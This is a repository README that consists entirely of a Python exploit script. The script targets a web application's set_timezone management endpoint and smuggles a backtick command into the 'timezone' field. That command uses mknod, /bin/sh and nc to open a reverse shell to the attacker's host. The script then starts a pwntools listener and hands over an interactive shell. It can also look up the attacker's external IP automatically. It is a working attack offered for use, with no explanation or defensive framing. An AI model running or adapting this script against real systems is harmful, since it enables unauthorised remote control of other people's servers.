README.md
Rendering markdown...
#!/usr/bin/python3
import requests
import argparse
import json
from pwn import *
def exploit(target,localhost,localport):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin': f'{target}',
'Referer': f'{target}/index.php/management/datetime',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'en-US,en;q=0.9',
'Connection': 'close'
}
data = {
'timezone': f'`mknod /tmp/pipe p;/bin/sh 0</tmp/pipe | nc {localhost} {localport} 1>/tmp/pipe`'
}
try:
response = requests.post(url, headers=headers, data=data, timeout=3)
except:
pass
def get_external_ip():
endpoint = 'https://ipinfo.io/json'
response = requests.get(endpoint, verify = True)
if response.status_code != 200:
return 'Status:', response.status_code, 'Problem with the request. Exiting.'
exit()
data = response.json()
return data['ip']
if __name__ == "__main__":
## parse argument
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--target", action="store", help="Target url, http://localhost:9000", default=False, required=True)
parser.add_argument("-l", "--localhost", action="store", help="Local IP address for reverse shell", default=False)
parser.add_argument("-p", "--localport", action="store", help="Local port for reverse shell", default="443")
args = parser.parse_args()
if args.target is not False:
if args.localhost is False:
# get external ip address for listener
try:
args.localhost = get_external_ip()
except:
print("Not able to get external IP address")
sys.exit(1)
# running listener
l = listen(args.localport)
# sending exploit payload
exploit(args.target,args.localhost,args.localport)
# waiting for a reverse connection
try:
s = l.wait_for_connection()
s.interactive()
except:
pass
finally:
l.close()
else:
parser.print_help()
parser.exit()